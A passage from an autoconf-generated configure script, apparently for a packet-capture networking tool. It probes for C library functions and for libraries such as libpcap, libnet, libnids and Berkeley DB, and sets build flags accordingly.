"x$ac_cv_type_in_addr_t" = xyes then : else case e in #( e) printf "%s\n" "#define in_addr_t u_int32_t" >>confdefs.h ;; esac fi CFLAGS="$CFLAGS -D_DEFAULT_SOURCE" { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for working memcmp" >&5 printf %s "checking for working memcmp... " >&6; } if test ${ac_cv_func_memcmp_working+y} then : printf %s "(cached) " >&6 else case e in #( e) if test "$cross_compiling" = yes then : ac_cv_func_memcmp_working=no else case e in #( e) cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $ac_includes_default int main (void) { /* Some versions of memcmp are not 8-bit clean. */ char c0 = '\100', c1 = '\200', c2 = '\201'; if (memcmp(&c0, &c2, 1) >= 0 || memcmp(&c1, &c2, 1) >= 0) return 1; /* The Next x86 OpenStep bug shows up only when comparing 16 bytes or more and with at least one buffer not starting on a 4-byte boundary. William Lewis provided this test program. */ { char foo[21]; char bar[21]; int i; for (i = 0; i < 4; i++) { char *a = foo + i; char *b = bar + i; strcpy (a, "--------01111111"); strcpy (b, "--------10000000"); if (memcmp (a, b, 16) >= 0) return 1; } return 0; } ; return 0; } _ACEOF if ac_fn_c_try_run "$LINENO" then : ac_cv_func_memcmp_working=yes else case e in #( e) ac_cv_func_memcmp_working=no ;; esac fi rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ conftest.$ac_objext conftest.beam conftest.$ac_ext ;; esac fi ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_func_memcmp_working" >&5 printf "%s\n" "$ac_cv_func_memcmp_working" >&6; } test $ac_cv_func_memcmp_working = no && case " $LIBOBJS " in *" memcmp.$ac_objext "* ) ;; *) LIBOBJS="$LIBOBJS memcmp.$ac_objext" ;; esac for ac_func in strftime do : ac_fn_c_check_func "$LINENO" "strftime" "ac_cv_func_strftime" if test "x$ac_cv_func_strftime" = xyes then : printf "%s\n" "#define HAVE_STRFTIME 1" >>confdefs.h else case e in #( e) # strftime is in -lintl on SCO UNIX. { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for strftime in -lintl" >&5 printf %s "checking for strftime in -lintl... " >&6; } if test ${ac_cv_lib_intl_strftime+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lintl $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char strftime (void); int main (void) { return strftime (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_intl_strftime=yes else case e in #( e) ac_cv_lib_intl_strftime=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_intl_strftime" >&5 printf "%s\n" "$ac_cv_lib_intl_strftime" >&6; } if test "x$ac_cv_lib_intl_strftime" = xyes then : printf "%s\n" "#define HAVE_STRFTIME 1" >>confdefs.h LIBS="-lintl $LIBS" fi ;; esac fi done ac_fn_c_check_func "$LINENO" "gethostname" "ac_cv_func_gethostname" if test "x$ac_cv_func_gethostname" = xyes then : printf "%s\n" "#define HAVE_GETHOSTNAME 1" >>confdefs.h fi ac_fn_c_check_func "$LINENO" "socket" "ac_cv_func_socket" if test "x$ac_cv_func_socket" = xyes then : printf "%s\n" "#define HAVE_SOCKET 1" >>confdefs.h fi ac_fn_c_check_func "$LINENO" "strdup" "ac_cv_func_strdup" if test "x$ac_cv_func_strdup" = xyes then : printf "%s\n" "#define HAVE_STRDUP 1" >>confdefs.h fi ac_fn_c_check_func "$LINENO" "strstr" "ac_cv_func_strstr" if test "x$ac_cv_func_strstr" = xyes then : printf "%s\n" "#define HAVE_STRSTR 1" >>confdefs.h fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for xdr_fhstatus in -lrpcsvc" >&5 printf %s "checking for xdr_fhstatus in -lrpcsvc... " >&6; } if test ${ac_cv_lib_rpcsvc_xdr_fhstatus+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lrpcsvc $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char xdr_fhstatus (void); int main (void) { return xdr_fhstatus (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_rpcsvc_xdr_fhstatus=yes else case e in #( e) ac_cv_lib_rpcsvc_xdr_fhstatus=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_rpcsvc_xdr_fhstatus" >&5 printf "%s\n" "$ac_cv_lib_rpcsvc_xdr_fhstatus" >&6; } if test "x$ac_cv_lib_rpcsvc_xdr_fhstatus" = xyes then : printf "%s\n" "#define HAVE_LIBRPCSVC 1" >>confdefs.h LIBS="-lrpcsvc $LIBS" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for clnt_tli_create in -ltirpc" >&5 printf %s "checking for clnt_tli_create in -ltirpc... " >&6; } if test ${ac_cv_lib_tirpc_clnt_tli_create+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-ltirpc $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char clnt_tli_create (void); int main (void) { return clnt_tli_create (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_tirpc_clnt_tli_create=yes else case e in #( e) ac_cv_lib_tirpc_clnt_tli_create=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_tirpc_clnt_tli_create" >&5 printf "%s\n" "$ac_cv_lib_tirpc_clnt_tli_create" >&6; } if test "x$ac_cv_lib_tirpc_clnt_tli_create" = xyes then : X_TIRPC_LIB="-ltirpc" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for ibv_close_device in -libverbs" >&5 printf %s "checking for ibv_close_device in -libverbs... " >&6; } if test ${ac_cv_lib_ibverbs_ibv_close_device+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-libverbs $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char ibv_close_device (void); int main (void) { return ibv_close_device (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_ibverbs_ibv_close_device=yes else case e in #( e) ac_cv_lib_ibverbs_ibv_close_device=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_ibverbs_ibv_close_device" >&5 printf "%s\n" "$ac_cv_lib_ibverbs_ibv_close_device" >&6; } if test "x$ac_cv_lib_ibverbs_ibv_close_device" = xyes then : X_IBVERBS_LIB="-libverbs" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for socket in -lsocket" >&5 printf %s "checking for socket in -lsocket... " >&6; } if test ${ac_cv_lib_socket_socket+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lsocket $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char socket (void); int main (void) { return socket (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_socket_socket=yes else case e in #( e) ac_cv_lib_socket_socket=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_socket_socket" >&5 printf "%s\n" "$ac_cv_lib_socket_socket" >&6; } if test "x$ac_cv_lib_socket_socket" = xyes then : printf "%s\n" "#define HAVE_LIBSOCKET 1" >>confdefs.h LIBS="-lsocket $LIBS" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for gethostbyname in -lnsl" >&5 printf %s "checking for gethostbyname in -lnsl... " >&6; } if test ${ac_cv_lib_nsl_gethostbyname+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lnsl $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char gethostbyname (void); int main (void) { return gethostbyname (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_nsl_gethostbyname=yes else case e in #( e) ac_cv_lib_nsl_gethostbyname=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_nsl_gethostbyname" >&5 printf "%s\n" "$ac_cv_lib_nsl_gethostbyname" >&6; } if test "x$ac_cv_lib_nsl_gethostbyname" = xyes then : printf "%s\n" "#define HAVE_LIBNSL 1" >>confdefs.h LIBS="-lnsl $LIBS" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for dn_expand in -lresolv" >&5 printf %s "checking for dn_expand in -lresolv... " >&6; } if test ${ac_cv_lib_resolv_dn_expand+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lresolv $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char dn_expand (void); int main (void) { return dn_expand (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_resolv_dn_expand=yes else case e in #( e) ac_cv_lib_resolv_dn_expand=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_resolv_dn_expand" >&5 printf "%s\n" "$ac_cv_lib_resolv_dn_expand" >&6; } if test "x$ac_cv_lib_resolv_dn_expand" = xyes then : printf "%s\n" "#define HAVE_LIBRESOLV 1" >>confdefs.h LIBS="-lresolv $LIBS" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for __dn_expand in -lresolv" >&5 printf %s "checking for __dn_expand in -lresolv... " >&6; } if test ${ac_cv_lib_resolv___dn_expand+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lresolv $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char __dn_expand (void); int main (void) { return __dn_expand (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_resolv___dn_expand=yes else case e in #( e) ac_cv_lib_resolv___dn_expand=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_resolv___dn_expand" >&5 printf "%s\n" "$ac_cv_lib_resolv___dn_expand" >&6; } if test "x$ac_cv_lib_resolv___dn_expand" = xyes then : printf "%s\n" "#define HAVE_LIBRESOLV 1" >>confdefs.h LIBS="-lresolv $LIBS" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for g_mutex_init in -lglib-2.0" >&5 printf %s "checking for g_mutex_init in -lglib-2.0... " >&6; } if test ${ac_cv_lib_glib_2_0_g_mutex_init+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lglib-2.0 $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char g_mutex_init (void); int main (void) { return g_mutex_init (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_glib_2_0_g_mutex_init=yes else case e in #( e) ac_cv_lib_glib_2_0_g_mutex_init=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_glib_2_0_g_mutex_init" >&5 printf "%s\n" "$ac_cv_lib_glib_2_0_g_mutex_init" >&6; } if test "x$ac_cv_lib_glib_2_0_g_mutex_init" = xyes then : printf "%s\n" "#define HAVE_LIBGLIB_2_0 1" >>confdefs.h LIBS="-lglib-2.0 $LIBS" fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for g_thread_init in -lgthread-2.0" >&5 printf %s "checking for g_thread_init in -lgthread-2.0... " >&6; } if test ${ac_cv_lib_gthread_2_0_g_thread_init+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lgthread-2.0 $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char g_thread_init (void); int main (void) { return g_thread_init (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_gthread_2_0_g_thread_init=yes else case e in #( e) ac_cv_lib_gthread_2_0_g_thread_init=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_gthread_2_0_g_thread_init" >&5 printf "%s\n" "$ac_cv_lib_gthread_2_0_g_thread_init" >&6; } if test "x$ac_cv_lib_gthread_2_0_g_thread_init" = xyes then : printf "%s\n" "#define HAVE_LIBGTHREAD_2_0 1" >>confdefs.h LIBS="-lgthread-2.0 $LIBS" fi ac_fn_c_check_func "$LINENO" "dirname" "ac_cv_func_dirname" if test "x$ac_cv_func_dirname" = xyes then : printf "%s\n" "#define HAVE_DIRNAME 1" >>confdefs.h else case e in #( e) case " $LIBOBJS " in *" dirname.$ac_objext "* ) ;; *) LIBOBJS="$LIBOBJS dirname.$ac_objext" ;; esac ;; esac fi ac_fn_c_check_func "$LINENO" "strlcpy" "ac_cv_func_strlcpy" if test "x$ac_cv_func_strlcpy" = xyes then : printf "%s\n" "#define HAVE_STRLCPY 1" >>confdefs.h else case e in #( e) case " $LIBOBJS " in *" strlcpy.$ac_objext "* ) ;; *) LIBOBJS="$LIBOBJS strlcpy.$ac_objext" ;; esac ;; esac fi ac_fn_c_check_func "$LINENO" "strlcat" "ac_cv_func_strlcat" if test "x$ac_cv_func_strlcat" = xyes then : printf "%s\n" "#define HAVE_STRLCAT 1" >>confdefs.h else case e in #( e) case " $LIBOBJS " in *" strlcat.$ac_objext "* ) ;; *) LIBOBJS="$LIBOBJS strlcat.$ac_objext" ;; esac ;; esac fi ac_fn_c_check_func "$LINENO" "strsep" "ac_cv_func_strsep" if test "x$ac_cv_func_strsep" = xyes then : printf "%s\n" "#define HAVE_STRSEP 1" >>confdefs.h else case e in #( e) case " $LIBOBJS " in *" strsep.$ac_objext "* ) ;; *) LIBOBJS="$LIBOBJS strsep.$ac_objext" ;; esac ;; esac fi needmd5=no for ac_func in MD5Update do : ac_fn_c_check_func "$LINENO" "MD5Update" "ac_cv_func_MD5Update" if test "x$ac_cv_func_MD5Update" = xyes then : printf "%s\n" "#define HAVE_MD5UPDATE 1" >>confdefs.h else case e in #( e) needmd5=yes ;; esac fi done if test $needmd5 = yes; then LIBOBJS="$LIBOBJS md5.o" fi neederr=no for ac_func in warnx do : ac_fn_c_check_func "$LINENO" "warnx" "ac_cv_func_warnx" if test "x$ac_cv_func_warnx" = xyes then : printf "%s\n" "#define HAVE_WARNX 1" >>confdefs.h else case e in #( e) neederr=yes ;; esac fi done if test $neederr = yes; then LIBOBJS="$LIBOBJS err.o" fi needethers=no for ac_func in ether_ntoa do : ac_fn_c_check_func "$LINENO" "ether_ntoa" "ac_cv_func_ether_ntoa" if test "x$ac_cv_func_ether_ntoa" = xyes then : printf "%s\n" "#define HAVE_ETHER_NTOA 1" >>confdefs.h else case e in #( e) needethers=yes ;; esac fi done if test $needethers = yes; then LIBOBJS="$LIBOBJS ethers.o" fi if test "x$no_x" = "x"; then WEBSPY="webspy"; fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether to enable static build" >&5 printf %s "checking whether to enable static build... " >&6; } # Check whether --enable-static was given. if test ${enable_static+y} then : enableval=$enable_static; enable_static="yes"; LDFLAGS_STATIC="-static" else case e in #( e) enable_static="no" ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $enable_static" >&5 printf "%s\n" "$enable_static" >&6; } if test "x$enable_static" = "xyes"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for libintl_gettext in -lintl" >&5 printf %s "checking for libintl_gettext in -lintl... " >&6; } if test ${ac_cv_lib_intl_libintl_gettext+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lintl $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char libintl_gettext (void); int main (void) { return libintl_gettext (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_intl_libintl_gettext=yes else case e in #( e) ac_cv_lib_intl_libintl_gettext=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_intl_libintl_gettext" >&5 printf "%s\n" "$ac_cv_lib_intl_libintl_gettext" >&6; } if test "x$ac_cv_lib_intl_libintl_gettext" = xyes then : printf "%s\n" "#define HAVE_LIBINTL 1" >>confdefs.h LIBS="-lintl $LIBS" fi fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether to enable BerkelyDB" >&5 printf %s "checking whether to enable BerkelyDB... " >&6; } # Check whether --enable-berkeleydb was given. if test ${enable_berkeleydb+y} then : enableval=$enable_berkeleydb; BDB="yes" else case e in #( e) BDB="no" ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $BDB" >&5 printf "%s\n" "$BDB" >&6; } if test x"${BDB}" = "xyes"; then printf "%s\n" "#define WITH_BERKELEYDB 1" >>confdefs.h fi if test x"${BDB}" = xyes; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for Berkeley DB with 1.85 compatibility" >&5 printf %s "checking for Berkeley DB with 1.85 compatibility... " >&6; } # Check whether --with-db was given. if test ${with_db+y} then : withval=$with_db; case "$withval" in yes|no) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } ;; *) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 printf "%s\n" "$withval" >&6; } if test -f $withval/build_unix/db_185.h -a \ -f $withval/build_unix/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi printf "%s\n" "#define HAVE_DB_185_H 1" >>confdefs.h DBINC="-I$withval/build_unix" DBLIB="-L$withval/build_unix -ldb" elif test -f $withval/dist/db_185.h -a \ -f $withval/dist/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi printf "%s\n" "#define HAVE_DB_185_H 1" >>confdefs.h DBINC="-I$withval/dist" DBLIB="-L$withval/dist -ldb" elif test -f $withval/include/db_185.h -a \ -f $withval/lib/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi printf "%s\n" "#define HAVE_DB_185_H 1" >>confdefs.h DBINC="-I$withval/include" DBLIB="-L$withval/lib -ldb" else as_fn_error $? "db_185.h or libdb.a not found in $withval or not configured with --enable-compat185" "$LINENO" 5 fi ;; esac else case e in #( e) for dir in ${prefix}/BerkeleyDB.3.1 ${prefix}/BerkeleyDB.3.0 \ ${prefix}/BerkeleyDB ${prefix}/db ${prefix}; do if test -f ${dir}/include/db_185.h; then printf "%s\n" "#define HAVE_DB_185_H 1" >>confdefs.h DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break elif test -f ${dir}/include/db.h; then printf "%s\n" "#define HAVE_DB_H 1" >>confdefs.h DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break fi done if test "x$have_db" = "x"; then if test -f /usr/include/db2/db_185.h; then printf "%s\n" "#define HAVE_DB_185_H 1" >>confdefs.h DBINC="-I/usr/include/db2" DBLIB="-ldb2" have_db=yes elif test -f /usr/include/db_185.h; then printf "%s\n" "#define HAVE_DB_185_H 1" >>confdefs.h DBLIB="-ldb" have_db=yes elif test -f /usr/include/db.h; then printf "%s\n" "#define HAVE_DB_H 1" >>confdefs.h have_db=yes fi fi if test "x$have_db" = "x"; then as_fn_error $? "Berkeley DB with 1.85 compatibility not found" "$LINENO" 5 fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } ;; esac fi fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for libpcap" >&5 printf %s "checking for libpcap... " >&6; } # Check whether --with-libpcap was given. if test ${with_libpcap+y} then : withval=$with_libpcap; case "$withval" in yes|no) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } ;; *) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 printf "%s\n" "$withval" >&6; } if test -f $withval/pcap.h -a -f $withval/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval -I$withval/bpf" PCAPLIB="-L$withval -lpcap" elif test -f $withval/include/pcap.h -a \ -f $withval/include/net/bpf.h -a \ -f $withval/lib/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval/include" PCAPLIB="-L$withval/lib -lpcap" else as_fn_error net/bpf.h "pcap.h" "$LINENO" 5 fi ;; esac else case e in #( e) if test -f ${prefix}/include/pcap.h; then PCAPINC="-I${prefix}/include" PCAPLIB="-L${prefix}/lib -lpcap" elif test -f /usr/include/pcap/pcap.h; then PCAPINC="-I/usr/include/pcap" PCAPLIB="-lpcap" elif test -f /usr/include/pcap.h; then PCAPLIB="-lpcap" else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } as_fn_error $? "libpcap not found" "$LINENO" 5 fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for libnet" >&5 printf %s "checking for libnet... " >&6; } # Check whether --with-libnet was given. if test ${with_libnet+y} then : withval=$with_libnet; case "$withval" in yes|no) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } ;; *) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 printf "%s\n" "$withval" >&6; } if test -f $withval/include/libnet.h -a -f $withval/lib/libnet.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi if test -f $withval/bin/libnet-config; then CFLAGS="$CFLAGS `$withval/bin/libnet-config --defines`" elif test -f $withval/libnet-config; then CFLAGS="$CFLAGS `$withval/libnet-config --defines`" else CFLAGS="$CFLAGS `libnet-config --defines`" fi LNETINC="-I$withval/include" LNETLIB="-L$withval/lib -lnet" else as_fn_error $? "libnet.h or libnet.a not found in $withval" "$LINENO" 5 fi ;; esac else case e in #( e) if test -f ${prefix}/include/libnet.h; then CFLAGS="$CFLAGS `${prefix}/bin/libnet-config --defines`" LNETINC="-I${prefix}/include" LNETLIB="-L${prefix}/lib -lnet" elif test -f /usr/include/libnet.h; then CFLAGS="$CFLAGS `libnet-config --defines`" LNETLIB="-lnet" else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } as_fn_error $? "libnet not found" "$LINENO" 5 fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for libnids" >&5 printf %s "checking for libnids... " >&6; } # Check whether --with-libnids was given. if test ${with_libnids+y} then : withval=$with_libnids; case "$withval" in yes|no) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } ;; *) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 printf "%s\n" "$withval" >&6; } if test -f $withval/src/nids.h -a -f $withval/src/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/src" NIDSLIB="-L$withval/src -lnids" elif test -f $withval/include/nids.h -a -f $withval/lib/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/include" NIDSLIB="-L$withval/lib -lnids" else as_fn_error $? "nids.h or libnids.a not found in $withval" "$LINENO" 5 fi ;; esac else case e in #( e) if test -f ${prefix}/include/nids.h; then NIDSINC="-I${prefix}/include" NIDSLIB="-L${prefix}/lib -lnids" elif test -f /usr/include/nids.h; then NIDSLIB="-lnids" else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } as_fn_error $? "libnids not found" "$LINENO" 5 fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } ;; esac fi save_cppflags="$CPPFLAGS" CPPFLAGS="$NIDSINC" { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether libnids version is good" >&5 printf %s "checking whether libnids version is good... " >&6; } { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for egrep -e" >&5 printf %s "checking for egrep -e... " >&6; } if test ${ac_cv_path_EGREP_TRADITIONAL+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -z "$EGREP_TRADITIONAL"; then ac_path_EGREP_TRADITIONAL_found=false # Loop through the user's path and test for each of PROGNAME-LIST as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_prog in grep ggrep do for ac_exec_ext in '' $ac_executable_extensions; do ac_path_EGREP_TRADITIONAL="$as_dir$ac_prog$ac_exec_ext" as_fn_executable_p 